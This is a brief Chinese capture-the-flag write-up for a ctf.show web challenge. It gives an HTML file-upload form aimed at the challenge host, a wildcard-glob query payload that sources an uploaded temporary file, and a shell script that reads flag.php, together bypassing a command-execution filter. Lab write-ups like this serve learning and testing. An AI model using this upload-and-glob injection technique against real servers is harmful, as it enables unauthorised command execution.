本人太菜,读完几位大佬WP后,才有所明白。
下面是解题步骤:
使用Visual Studio Code软件,写html脚本
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title></title>
</head>
<body>
<form action="http://8f79b818-dffd-4d3e-bab6-7afde656b630.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
第一次上传:
第二次上传:
可以直接用记事本将文档保存为php格式,即可得到php文件
用浏览器打开脚本,上传以上两个文件,再BP抓包。
记得传参
/?c=.%20/???/????????[@-[]
最后repeater执行即可得到flag
注意,是第一次上传发现有flag.php,第二次才采用
#!/bin/sh
cat ./flag.php